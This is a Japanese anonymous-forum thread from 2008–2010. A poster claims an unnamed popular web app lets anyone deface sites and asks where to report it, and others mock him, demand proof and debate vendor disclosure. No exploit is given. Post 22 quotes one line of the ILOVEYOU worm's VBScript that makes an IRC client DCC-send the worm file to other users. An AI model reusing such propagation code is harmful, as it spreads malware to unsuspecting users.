某有名ウェブアプリにサイト改ざんの脆弱性があるのを発見してしまった・・・。
あまりに多くのサイト大規模サイトに使われている為に
そのアプリの名前を言うことが出来ないんだが、
現にそのウェブアプリを使って運営しているサイトが
改ざんされ、マルウェアサイトへのリンクが埋め込まれている。
どこに報告すればいいんだろう?
ちなみに、この脆弱性。
やり方を知ると、誰でも簡単に実行できてしまう。
誰でも簡単にサイトを改竄できてしまう。
ツーボイン!ウォー♪
_ ∩
( ゚∀゚)彡 おっぱい!おっぱい!
⊂彡
\
::::: \
>>1の両腕に冷たい鉄の輪がはめられた
\::::: \
\::::: _ヽ __ _ 外界との連絡を断ち切る契約の印だ。
ヽ/, /_ ヽ/、 ヽ_
// /< __) l -,|__) > 「刑事さん・・・、俺、どうして・・・
|| | < __)_ゝJ_)_> 改ざんなんて・・・しちゃったのかな?」
\ ||.| < ___)_(_)_ >
\| | <____ノ_(_)_ ) とめどなく大粒の涙がこぼれ落ち
ヾヽニニ/ー--'/ 震える彼の掌を濡らした。
|_|_t_|_♀__|
9 ∂ 「お前のIPは晒されていたんだよ・・・低脳くんよ・・・」
6 ∂
(9_∂
>>1は声をあげて泣いた。
黙って報告してやれよ
>>1 ガセネタ流して満足かい?ガセじゃないなら製品名と脆弱性の検証ソースを見せてみろよ。
誰も
>>1には期待して無いと思うけどなw
ウェブアプリ製作元にメールしたら?
それ一番最悪な対策法だから↑
製作者に連絡したら、サイトが改ざんされるのは、
”仕様” といわれた。
そんな仕様ありか?
>>10 この場合はいいんじゃねぇの?
証拠隠滅図れないし
セキュリティ板民なら言わずと知れたことだろう。
それにしても、あのサイトらがやる気満々なところが藁えるな。
これから、このセキュリティリスクをどう乗り越えるかが課題だな。
17 :
名無しさん@お腹いっぱい。:2008/05/09(金) 16:56:55
サイト改竄されたら何か問題なの?
落書きされるだけじゃん?
すぐに修正すればいいだけだと思うけど。
18 :
名無しさん@お腹いっぱい。:2008/05/18(日) 20:34:03
あげ
Windowsに搭載されてるIISの脆弱性の
世界50万鯖がアクセスするとやばいってやってたやつ?
日本語でおk
21 :
名無しさん@お腹いっぱい。:2008/06/04(水) 01:53:07
wikiには誰もサイト改ざんできる脆弱性があるよ。
22 :
名無しさん@お腹いっぱい。:2010/03/06(土) 11:31:11
Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
まだ直ってない?
25 :
名無しさん@お腹いっぱい。: